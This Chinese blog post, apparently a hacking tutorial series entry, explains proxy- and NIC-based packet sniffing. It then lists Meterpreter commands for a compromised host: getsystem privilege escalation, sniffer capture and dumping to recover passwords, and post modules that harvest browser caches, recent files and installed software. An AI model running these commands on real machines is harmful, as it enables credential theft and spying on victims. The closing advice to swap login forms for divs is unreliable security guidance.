黑客攻击-木马程序(3)

声明：禁止用作非法目的，谢绝一切形式的转载。

当你在登陆某个网站的时候，当你在用ftp登陆传输文件的时候，你的密码可能已经被嗅探到了。黑客利用网络嗅探可以获取大量有用的信息。

文章目录

预备条件
网络抓包
- 代理服务器
- - 代理服务器
  - 抓包原理
- 网卡
- - 网卡
  - Wireshark协议分析器原理
- meterpreter网络嗅探
meterpreter获取敏感数据
写在最后
公众号

预备条件

生成木马，可参考这里
获取meterpreter，可参考这里

网络抓包

抓取数据包通常有两种方式，一种时基于代理服务器的，像Burpsuit、Fiddler等，另一种就是基于网卡，最著名的就是Wireshark。这里主要指的是抓取web的数据流。

代理服务器

代理服务器英文全称是（Proxy Server），其功能就是代理网络用户去取得网络信息。形象的说：它是网络信息的中转站。代理服务器就好象一个大的Cache，这样就能显著提高浏览速度和效率。更重要的是：Proxy Server（代理服务器）是Internet链路级网关所提供的一种重要的安全功能

抓包原理

下图展示了数据流的走向，很明显，这就是大名鼎鼎的"中间人攻击"，所有的数据流都要走代理服务器，因此代理服务器能截获所有的数据流。Burpsuit以及Fiddler等都是基于这种原理。

浏览器代理服务器真正服务器ssl client hello代理服务器的证书(C1)ssl client hello真正服务器的证书(C2)浏览器代理服务器真正服务器

网卡

网卡(NIC)是局域网（LAN,全称是：Local Area NetWork）中连接计算机和传输介质的接口，它工作在物理层(L1）。它是处于主机箱内的一块网络接口板，因为它的存在，从而使得本机能够与外部局域网进行连接通信。任何一台计算机，想要进行上网、通信功能，就必须使用网卡。

Wireshark协议分析器原理

网络上传输的数据包通过网卡进入到网络协议分析器系统。协议分析器所使用的网卡和网卡驱动程序必须能够支持“混杂模式操作（Promiscuous Mode Operation）”。因为只有运行在混杂模式下的网卡才能够捕获到网络中传输到其他设备的“广播数据包、多播数据包、单播数据包以及错误数据包等等”，两者一起协同工作。分析器原理图如下：

meterpreter网络嗅探

加载嗅探模块 use sniffer
提升权限到System getsystem
列出"肉鸡"所有开放的网络接口 sniffer_interfaces
获取正在实施嗅探网络接口的统计数据 sniffer_start 3
dump数据包 sniffer_dump 3 /tmp/test3.cap
用wireshark分析数据包，可以看到用户名密码都是burning

meterpreter获取敏感数据

run post/windows/gather/checkvm #是否虚拟机

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks #获取最近的文件操作

run post/windows/gather/enum_ie #获取IE缓存

run post/windows/gather/enum_chrome #获取Chrome缓存

写在最后

尽量不要使用表单进行登陆，这个可以考虑使用div等来进行替换。对于密码传输，明文是不应该出出现的，因此像FTP这样的工具应该谨慎使用。

公众号

更多网络安全，欢迎关注我的公众号:无情剑客。